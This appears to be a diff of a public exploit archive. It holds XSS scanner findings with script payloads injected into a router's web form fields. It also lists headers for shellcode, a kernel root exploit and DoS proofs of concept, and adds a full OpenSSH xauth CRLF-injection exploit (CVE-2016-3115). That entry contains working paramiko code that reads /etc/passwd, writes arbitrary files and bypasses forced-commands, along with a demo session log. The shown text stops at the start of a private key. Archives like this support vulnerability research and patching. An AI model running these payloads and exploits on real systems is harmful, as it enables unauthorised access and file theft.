+wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -1206,9 +1206,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=</tit
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_startPort has been set to </textarea><ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_startPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt> .
-wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=</textarea><ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -1278,9 +1278,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_startPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt> .
-wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -1358,9 +1358,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT
 /Forms/rpNATvirsvr_argen_1
 Details
-The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt> .
+The POST variable wzVIRTUALSVR_startPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt> .
-wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
+wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
 ##################################################################################################################################
@ -1486,9 +1486,9 @@ Connect_DialHidden=0&Connect_DialFlag=>'><ScRiPt%20%0a%0d>alert(402485284507)%3B
 /Forms/rpStatus_argen_1
 Details
-The POST variable Connect_DialFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt> .
+The POST variable Connect_DialFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt> .
-Connect_DialHidden=0&Connect_DialFlag=</textarea><ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt>&Connect_Flag=0
+Connect_DialHidden=0&Connect_DialFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt>&Connect_Flag=0
 ##################################################################################################################################
@ -1526,9 +1526,9 @@ Connect_DialHidden=email@some<ScRiPt%20%0a%0d>alert(402435284505)%3B</ScRiPt>dom
 /Forms/rpStatus_argen_1
 Details
-The POST variable Connect_DialHidden has been set to </textarea><ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt> .
+The POST variable Connect_DialHidden has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt> .
-Connect_DialHidden=</textarea><ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt>&Connect_
+Connect_DialHidden=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt>&Connect_
 ##################################################################################################################################
@ -1566,9 +1566,9 @@ Connect_DialHidden=>'><ScRiPt%20%0a%0d>alert(402385284505)%3B</ScRiPt>&Connect_D
 /Forms/rpStatus_argen_1
 Details
-The POST variable Connect_Flag has been set to </textarea><ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt> .
+The POST variable Connect_Flag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt> .
-Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=</textarea><ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt>
+Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt>
 ##################################################################################################################################
@ -1756,9 +1756,9 @@ The POST variable Telephone_select has been set to >'><ScRiPt%20%0a%0d>alert(404
 /Forms/rpwizard_1
 Details
-The POST variable Telephone_select has been set to </textarea><ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt> .
+The POST variable Telephone_select has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt> .
-Telephone_select=</textarea><ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0
+Telephone_select=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0
 ##################################################################################################################################
@ -1816,7 +1816,7 @@ Telephone_select=email@some<ScRiPt%20%0a%0d>alert(404195310549)%3B</ScRiPt>domai
 /Forms/rpwizard_1
 Details
-The POST variable Telephone_select has been set to </textarea><ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt> .Telephone_select=</textarea><ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt>&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0
+The POST variable Telephone_select has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt> .Telephone_select=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt>&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0
 ##################################################################################################################################
@ -1846,9 +1846,9 @@ Telephone_select=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28404215310549%29%
 /Forms/rpwizard_1
 Details
-The POST variable Telephone_select has been set to </textarea><ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt> .
+The POST variable Telephone_select has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt> .
-Telephone_select=0&Telephone_select=</textarea><ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0
+Telephone_select=0&Telephone_select=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0
 ##################################################################################################################################
@ -1878,9 +1878,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=<script>alert(404225310
 /Forms/rpwizard_1
 Details
-The POST variable wzFirstFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(404565310554)%3B</ScRiPt> .
+The POST variable wzFirstFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404565310554)%3B</ScRiPt> .
-Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea>
+Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=&lt;/textarea&gt;
 ##################################################################################################################################
@ -1958,9 +1958,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=>'><ScRiPt%20%0a%0d>ale
 /Forms/rpwizard_1
 Details
-The POST variable wzFirstFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt> .
+The POST variable wzFirstFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt> .
-Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea><ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt>
+Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt>
 ##################################################################################################################################
@ -2014,9 +2014,9 @@ wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwo
 /Forms/rpwizPppoe_1
 Details
-The POST variable wzConnectFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt> .
+The POST variable wzConnectFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt> .
-wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=</textarea><ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt>
+wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt>
 ##################################################################################################################################
--- a/platforms/hardware/webapps/10347.txt
+++ b/platforms/hardware/webapps/10347.txt
@ -1,4 +1,3 @@
 PenTest Information:
 ====================
 GESEC Team (~remove) discover multiple Input Validation Vulnerabilities on Barracuda IM Firewall.
--- a/platforms/lin_x86-64/shellcode/13463.c
+++ b/platforms/lin_x86-64/shellcode/13463.c
@ -1,4 +1,3 @@
 /*
 linux/x86-64  bindshell(port 4444)
 xi4oyu [at] 80sec.com
--- a/platforms/linux/local/4756.c
+++ b/platforms/linux/local/4756.c
@ -1,4 +1,3 @@
 /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
 *
 * 19 October 2005
--- a/platforms/linux/local/7393.txt
+++ b/platforms/linux/local/7393.txt
@ -1,4 +1,3 @@
 -----------------------------------------------------------------------
 + safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. +
 + By Milen Rangelov <gat3way@gat3way.eu>                              +
--- a/platforms/multiple/dos/1204.html
+++ b/platforms/multiple/dos/1204.html
@ -1,4 +1,3 @@
 <!--
 Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String
--- a/platforms/multiple/dos/1213.c
+++ b/platforms/multiple/dos/1213.c
@ -1,4 +1,3 @@
 /*_------------------------------------------_
 ||------+ Snort <= 2.4.0 Trigger p0c +------||
 ||__________________________________________||
--- a/platforms/multiple/dos/8320.py
+++ b/platforms/multiple/dos/8320.py
@ -1,4 +1,3 @@
 #
 #   Author : Ahmed Obied (ahmed.obied@gmail.com)
 #
--- a/platforms/multiple/local/4392.txt
+++ b/platforms/multiple/local/4392.txt
@ -1,5 +1,4 @@
 Affected Products:
 <= PHP 5.2.3
 <= PHP 4.4.7
--- a/platforms/multiple/remote/1007.html
+++ b/platforms/multiple/remote/1007.html
@ -39,7 +39,7 @@ document.getElementById('linkhtml_"+os+"').value",300);
 <textarea id="clearhtml" style="display:none">
 <link rel="SHORTCUT ICON" href="favicon.ico">
-</textarea>
+&lt;/textarea&gt;
 <textarea id="linkhtml_win" style="display:none">
 <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('
@ -50,7 +50,7 @@ nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/net
 file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
 outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n
 PAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
-</textarea>
+&lt;/textarea&gt;
 <textarea id="linkhtml_mac" style="display:none">
 <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
@ -61,7 +61,7 @@ NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
 file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
 outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
 (output,output.length);outputStream.close();','','')">
-</textarea>
+&lt;/textarea&gt;
 <textarea id="linkhtml_linux" style="display:none">
 <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
@ -72,7 +72,7 @@ NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
 file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
 outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
 (output,output.length);outputStream.close();','','')">
-</textarea>
+&lt;/textarea&gt;
 <br><br>
 <a href="#" onclick="runDemo();runDemo();">Run exploit</a>
 </div>
--- a/platforms/multiple/remote/39569.py
+++ b/platforms/multiple/remote/39569.py
@ -0,0 +1,498 @@
 '''
 Author:     <github.com/tintinweb>
 Ref:        https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
 Version:    0.2
 Date:       Mar 3rd, 2016
 Tag:        openssh xauth command injection may lead to forced-command and /bin/false bypass
 Overview
 --------
 Name:           openssh
 Vendor:         OpenBSD
 References:     * http://www.openssh.com/[1]
 Version:        7.2p1 [2]
 Latest Version: 7.2p1
 Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
 Platform(s):    linux
 Technology:     c
 Vuln Classes:   CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
 Origin:         remote
 Min. Privs.:    post auth
 CVE:            CVE-2016-3115
 Description
 ---------
 quote website [1]
 > OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
 Summary
 -------
 An authenticated user may inject arbitrary xauth commands by sending an
 x11 channel request that includes a newline character in the x11 cookie.
 The newline acts as a command separator to the xauth binary. This attack requires
 the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.
 By injecting xauth commands one gains limited* read/write arbitrary files,
 information leakage or xauth-connect capabilities. These capabilities can be
 leveraged by an authenticated restricted user - e.g. one with the login shell
 configured as /bin/false or one with configured forced-commands - to bypass
 account restriction. This is generally not expected.
 The injected xauth commands are performed with the effective permissions of the
 logged in user as the sshd already dropped its privileges.
 Quick-Info:
 * requires: X11Forwarding yes
 * bypasses /bin/false and forced-commands
 ** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)
 * does not bypass /bin/nologin (as there is special treatment for this)
 Capabilities (xauth):
 * Xauth
 	* write file: limited chars, xauthdb format
 	* read file: limit lines cut at first \s
 	* infoleak: environment
 	* connect to other devices (may allow port probing)
 PoC see ref github.
 Patch see ref github.
 Details
 -------
 // see annotated code below
    * server_input_channel_req (serverloop.c)
     *- session_input_channel_req:2299 (session.c [2])
      *- session_x11_req:2181
    * do_exec_pty or do_exec_no_pty
     *- do_child
      *- do_rc_files (session.c:1335 [2])
 Upon receiving an `x11-req` type channel request sshd parses the channel request
 parameters `auth_proto` and `auth_data` from the client ssh packet where
 `auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
 and `auth_data` contains the actual x11 auth cookie. This information is stored
 in a session specific datastore. When calling `execute` on that session, sshd will
 call `do_rc_files` which tries to figure out if this is an x11 call by evaluating
 if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND
 there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`
 is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.
 Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains
 user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
 command-separator to the `xauth` binary, this allows a client to inject arbitrary
 `xauth` commands.
 Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted
 input as arguments to that script.
 Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]
 This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth
 command injection:
 	SYNOPSIS
       	xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]
 		add displayname protocolname hexkey
 		generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
 		[n]extract filename displayname...
 		[n]list [displayname...]
 		[n]merge [filename...]
 		remove displayname...
 		source filename
 		info
 		exit
 		quit
 		version
 		help
 		?
 Interesting commands are:
 	info	 - leaks environment information / path
 			~# xauth info
 			xauth:  file /root/.Xauthority does not exist
 			Authority file:       /root/.Xauthority
 			File new:             yes
 			File locked:          no
 			Number of entries:    0
 			Changes honored:      yes
 			Changes made:         no
 			Current input:        (argv):1
 	source	 - arbitrary file read (cut on first `\s`)
 			# xauth source /etc/shadow
 			xauth:  file /root/.Xauthority does not exist
 			xauth: /etc/shadow:1:  unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
 	extract  - arbitrary file write
 			 * limited characters
 	         * in xauth.db format
 	         * since it is not compressed it can be combined with `xauth add` to
 	           first store data in the database and then export it to an arbitrary
 	           location e.g. to plant a shell or do other things.
 	generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
 			   vulnerabilities in X.org
 Source
 ------
 Inline annotations are prefixed with `//#!`
 /*
 * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
 * first in this order).
 */
 static void
 do_rc_files(Session *s, const char *shell)
 {
 ...
 		snprintf(cmd, sizeof cmd, "%s -q -",				
 		    options.xauth_location);
 		f = popen(cmd, "w");							//#! run xauth -q -
 		if (f) {
 			fprintf(f, "remove %s\n",					//#! remove <user_tainted_data> - injecting \n auth_display injects xauth command
 			    s->auth_display);
 			fprintf(f, "add %s %s %s\n",				//#! \n injection
 			    s->auth_display, s->auth_proto,
 			    s->auth_data);
 			pclose(f);
 		} else {
 			fprintf(stderr, "Could not run %s\n",
 			    cmd);
 		}
 	}
 }
 Proof of Concept
 ----------------
 Prerequisites:
 * install python 2.7.x
 * issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
 * make sure `poc.py`
 Usage: <host> <port> <username> <password or path_to_privkey>
        path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
 poc:
 1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:
 #PUBKEY line - force commands: only allow "whoami"
 #cat /home/user1/.ssh/authorized_keys
 command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box
 #cat /etc/passwd
 user2:x:1001:1002:,,,:/home/user2:/bin/false
 2. run sshd with `X11Forwarding yes` (kali default config)
 #> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d
 3. `forced-commands` - connect with user1 and display env information
 #> python <host> 22 user1 .demoprivkey
 INFO:__main__:add this line to your authorized_keys file:
 #PUBKEY line - force commands: only allow "whoami"
 #cat /home/user/.ssh/authorized_keys
 command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
 INFO:__main__:connecting to: user1:<PKEY>@host:22
 INFO:__main__:connected!
 INFO:__main__:
 Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>
 #> .info
 DEBUG:__main__:auth_cookie: '\ninfo'
 DEBUG:__main__:dummy exec returned: None
 INFO:__main__:Authority file:       /home/user1/.Xauthority
 File new:             no
 File locked:          no
 Number of entries:    1
 Changes honored:      yes
 Changes made:         no
 Current input:        (stdin):3
 /usr/bin/xauth: (stdin):2:  bad "add" command line
 ...
 4. `forced-commands` - read `/etc/passwd`
 ...
 #> .readfile /etc/passwd
 DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
 DEBUG:__main__:dummy exec returned: None
 INFO:__main__:root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 ...
 5. `forced-commands` - write `/tmp/testfile`
 #> .writefile /tmp/testfile `thisisatestfile`
 DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
 DEBUG:__main__:dummy exec returned: None
 DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500'
 DEBUG:__main__:dummy exec returned: None
 DEBUG:__main__:/usr/bin/xauth: (stdin):2:  bad "add" command line
 #> ls -lsat /tmp/testfile
 4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile
 #> cat /tmp/testfile
 \FA65500hi\FA65500`thisisatestfile`\AA
 6. `/bin/false` - connect and read `/etc/passwd`
 #> python <host> 22 user2 user2password
 INFO:__main__:connecting to: user2:user2password@host:22
 INFO:__main__:connected!
 INFO:__main__:
 Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>
 #> .readfile /etc/passwd
 DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
 DEBUG:__main__:dummy exec returned: None
 INFO:__main__:root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 ...
 user2:x:1001:1002:,,,:/home/user2:/bin/false
 ...
 7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100
 #> generate 8.8.8.8:100 .	
 #> tcpdump
 IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0
 Mitigation / Workaround
 ------------------------
 * disable x11-forwarding: `sshd_config` set `X11Forwarding no`
 * disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`
 Notes
 -----
 Verified, resolved and released within a few days. very impressive.
 Vendor response: see advisory [5]
 References
 ----------
 [1] http://www.openssh.com/
 [2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388
 [3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376
 [4] http://linux.die.net/man/1/xauth
 [5] http://www.openssh.com/txt/x11fwd.adv
 '''
 #!/usr/bin/env python
 # -*- coding: UTF-8 -*-
 # Author : <github.com/tintinweb>
 ###############################################################################
 #
 # FOR DEMONSTRATION PURPOSES ONLY!
 #
 ###############################################################################
 import logging
 import StringIO
 import sys
 import os
 LOGGER = logging.getLogger(__name__)
 try:
    import paramiko
 except ImportError, ie:
    logging.exception(ie)
    logging.warning("Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko")
    sys.exit(1)
 class SSHX11fwdExploit(object):
    def __init__(self, hostname, username, password, port=22, timeout=0.5, 
                 pkey=None, pkey_pass=None):
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        if pkey:
            pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)
        self.ssh.connect(hostname=hostname, port=port, 
                         username=username, password=password, 
                         timeout=timeout, banner_timeout=timeout,
                         look_for_keys=False, pkey=pkey)
    def exploit(self, cmd="xxxx\n?\nsource /etc/passwd\n"):
        transport = self.ssh.get_transport()
        session = transport.open_session()
        LOGGER.debug("auth_cookie: %s"%repr(cmd))
        session.request_x11(auth_cookie=cmd)
        LOGGER.debug("dummy exec returned: %s"%session.exec_command(""))
        transport.accept(0.5)
        session.recv_exit_status()  # block until exit code is ready
        stdout, stderr = [],[]
        while session.recv_ready():
            stdout.append(session.recv(4096))
        while session.recv_stderr_ready():
            stderr.append(session.recv_stderr(4096))
        session.close()
        return ''.join(stdout)+''.join(stderr)              # catch stdout, stderr
    def exploit_fwd_readfile(self, path):
        data = self.exploit("xxxx\nsource %s\n"%path)
        if "unable to open file" in data:
            raise IOError(data)
        ret = []
        for line in data.split('\n'):
            st = line.split('unknown command "',1)
            if len(st)==2:
                ret.append(st[1].strip(' "'))
        return '\n'.join(ret)
    def exploit_fwd_write_(self, path, data):
        '''
        adds display with protocolname containing userdata. badchars=<space>
        '''
        dummy_dispname = "127.0.0.250:65500"
        ret = self.exploit('\nadd %s %s aa'%(dummy_dispname, data))
        if ret.count('bad "add" command line')>1:
            raise Exception("could not store data most likely due to bad chars (no spaces, quotes): %s"%repr(data))
        LOGGER.debug(self.exploit('\nextract %s %s'%(path,dummy_dispname)))
        return path
 demo_authorized_keys = '''#PUBKEY line - force commands: only allow "whoami"
 #cat /home/user/.ssh/authorized_keys
 command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
 '''    
 PRIVKEY = """-----BEGIN RSA PRIVATE KEY-----
